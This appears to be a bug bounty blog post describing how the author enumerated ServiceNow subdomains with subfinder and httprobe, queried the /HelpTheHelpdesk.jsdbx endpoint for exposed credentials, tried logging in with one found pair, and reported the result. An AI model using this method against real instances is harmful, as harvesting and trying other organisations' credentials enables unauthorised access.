After I read the blog post on PostSwigger which is about ServiceNow admin credentials exposed, I began to think about whether all the credentials gathered. I set to work without a moment’s delay. I have to say that I wasn’t aware of how to find the subdomains. All I know is, there can be some login credentials on *.service-now.com/HelpTheHelpdesk.jsdbx. I pictured all the steps in my mind.
I have to find the subdomains. ( *.service-now.com). And then send a GET request to /HelpTheHelpdesk.jsdbx endpoint, and check the response automatically. The hardest part of this process was to automate the GET request and check the response.
After quick research, I found subfinder and cloned it. I run the command below .
subfinder -d service-now.com -o subdomains.txt
But there was a problem that I didn’t know. All the subdomains are not live. It is impossible to pick the live one’s manually.
`httprobe` save the situation. I gave the subdomains.txt to httprobe and created a new file called livesubdomains.txt.
How would I send a GET request to the endpoint and check the response? I didn’t know though. Googled it and write my own script with the help of a python request library.
I know that the code is neither the fastest nor efficient one however it’s working at least and was OK for me. I would appreciate it if you would share your opinions and feedback.
I got several responses which include httpPassword = keyword. All except one has empty credentials. httpPassword= ““ and httpUsername = ““. All the credentials were deleted except one.
No matter how many times I tried to login with these credentials, unfortunately I couldn’t login successfully. Nevertheless, I prepared a proper report and sent it.
I am not the person who found that vulnerability, I wish I were. At least I’ve learnt loads of things. I learn and share as I learn. If you would have any feedback, feel free to reach me out.